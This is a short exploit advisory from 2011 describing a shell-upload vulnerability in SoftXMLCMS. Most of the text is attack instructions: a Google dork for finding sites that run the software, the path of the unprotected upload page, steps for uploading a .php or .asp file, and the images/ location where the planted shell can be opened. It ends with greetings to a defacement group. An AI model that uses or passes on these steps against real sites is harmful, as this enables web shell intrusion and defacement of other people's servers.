SoftXMLCMS suffers from a shell upload vulnerability.
62f3608ce9f2df238e5192105586b63c58f00a33e0b754f1db13fa0aed0337a8
###########################################################################
Exploit Title : softxmlcms Shell Upload Vulnerability
Google Dork : Powered by softxmlcms
Date : 2011-04-15
Author : *Alexander*
Software Link : http://www.softxml.com
Test On : Windows/asp/php
CVE : Web Applications
###########################################################################
===[ Exploit ]===
http://server/[patch]/XMLEditor2.0/uploadfile1.asp
Select the Choose File And Then Browse File.php Or File.asp
===[ Upload To ]===
http://server/[patch]/images/File.php
Or
http://server/[patch]/images/File.asp
===[ Demo ]===
http://server/softxmlcms/XMLEditor2.0/uploadfile1.asp
###########################################################################
Greetz : http://Ashiyane.org/Forums
Behrooz_Ice , Q7X , Virangar , Black And All Ashiyane Defacers